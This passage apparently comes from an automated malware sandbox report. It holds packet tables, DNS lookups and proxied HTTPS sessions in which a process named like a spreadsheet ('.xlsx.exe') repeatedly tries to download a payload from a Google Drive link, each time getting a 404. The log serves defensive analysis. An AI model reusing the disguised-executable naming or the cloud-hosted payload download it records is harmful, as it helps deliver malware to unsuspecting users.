                                                        Dec 16, 2024 17:59:03.959861040 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:03.960051060 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:03.960716963 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:03.960817099 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:03.962733030 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:03.962743998 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:03.963002920 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:03.963063002 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:03.963471889 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.007334948 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:04.869347095 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:04.869415998 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:04.869417906 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.869465113 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.869633913 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.869633913 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.869648933 CET44349812172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:04.869699955 CET49812443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:04.881609917 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:04.881637096 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:04.881745100 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:04.882204056 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:04.882220984 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:06.581337929 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:06.581415892 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:06.582003117 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:06.582010984 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:06.582098961 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:06.582103968 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.541450024 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.541666985 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.541690111 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.541759968 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.542453051 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.542515993 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.542525053 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.542537928 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.542592049 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.542670965 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.542670965 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.542701006 CET44349822142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:07.542776108 CET49822443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:07.666299105 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:07.666356087 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:07.666433096 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:07.666961908 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:07.666975021 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:09.362186909 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:09.362283945 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:09.362710953 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:09.362715960 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:09.362914085 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:09.362917900 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268214941 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268313885 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268353939 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268405914 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268857002 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268906116 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268982887 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.269027948 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.280675888 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.280718088 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.297277927 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.297347069 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:10.297420979 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.302861929 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.302901983 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997070074 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997155905 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997663021 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997694969 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997840881 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997854948 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.944087982 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945013046 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945139885 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.945168018 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945271969 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945331097 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.947024107 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.947046995 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:13.072477102 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.072586060 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:13.072736025 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.073101997 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.073179960 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.770392895 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.770459890 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.770939112 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.770951033 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.771297932 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.771310091 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.674804926 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.674896955 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.674957037 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.675024986 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.675077915 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.675132990 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.675192118 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.694299936 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694349051 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:15.694422007 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694627047 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694655895 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.391810894 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.391916990 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392412901 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392440081 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.392589092 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392601967 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349292994 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349390030 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.349421978 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349474907 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350234032 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350310087 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350317001 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350358963 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350415945 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350492954 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350789070 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350807905 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.478457928 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.478509903 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:18.478709936 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.479049921 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.479069948 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.270028114 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.270127058 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.271250010 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.271352053 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.273653030 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.273678064 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.274080038 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.274220943 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.274579048 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.315335035 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.190777063 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.190845013 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.190875053 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.191129923 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.191741943 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.191843033 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.191936016 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.216115952 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216156960 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:21.216217041 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216562986 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216578007 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920037985 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920128107 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920567989 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920573950 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920747042 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920752048 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.873908043 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874824047 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.874856949 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874865055 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874932051 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.874938011 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874943972 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.875000954 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.875508070 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.875523090 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:24.041398048 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041455030 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:24.041575909 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041912079 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041925907 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.744683981 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.744760036 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:25.745552063 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.745599985 CET49869443192.168.2.8172.217.19.174

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2024 17:57:39.489759922 CET5059553192.168.2.81.1.1.1
                                                        Dec 16, 2024 17:57:39.627165079 CET53505951.1.1.1192.168.2.8
                                                        Dec 16, 2024 17:57:42.281119108 CET5512953192.168.2.81.1.1.1
                                                        Dec 16, 2024 17:57:42.421823025 CET53551291.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 16, 2024 17:57:39.489759922 CET192.168.2.81.1.1.10x36bcStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Dec 16, 2024 17:57:42.281119108 CET192.168.2.81.1.1.10x8cb1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 16, 2024 17:57:39.627165079 CET1.1.1.1192.168.2.80x36bcNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                        Dec 16, 2024 17:57:42.421823025 CET1.1.1.1192.168.2.80x8cb1No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849709172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:41 UTC216OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-12-16 16:57:42 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-VfbgEh3aKhelumzIyQyebQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849711142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:44 UTC258OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-12-16 16:57:45 UTC2218INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC60LLM-YOjU2VrKMTjpmXbpPVmM74hqJjyQrxmJmjl24gxzL-xoK9fFdX9dHWiI3VV-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:44 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-_i5LuK7XBh8MWkD8_0OGOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY; expires=Tue, 17-Jun-2025 16:57:44 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 2d 6b 57 4b 4a 31 53 31 78 47 57 79 39 42 34 33 5f 49 71 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q-kWKJ1S1xGWy9B43_IqZA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.849712172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:46 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:47 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:47 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-1BHfC7Cb7mIyKiLupaOSSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.849713142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:49 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:50 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4RiefLl7qtWaDPETfzM1yTb_9B2r_CaWGLI2NqmfUnyR6mkUk2LA-fv-MfJwtxQE-A
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:50 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-i4SZdSRTxK8HNjMx0AacNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
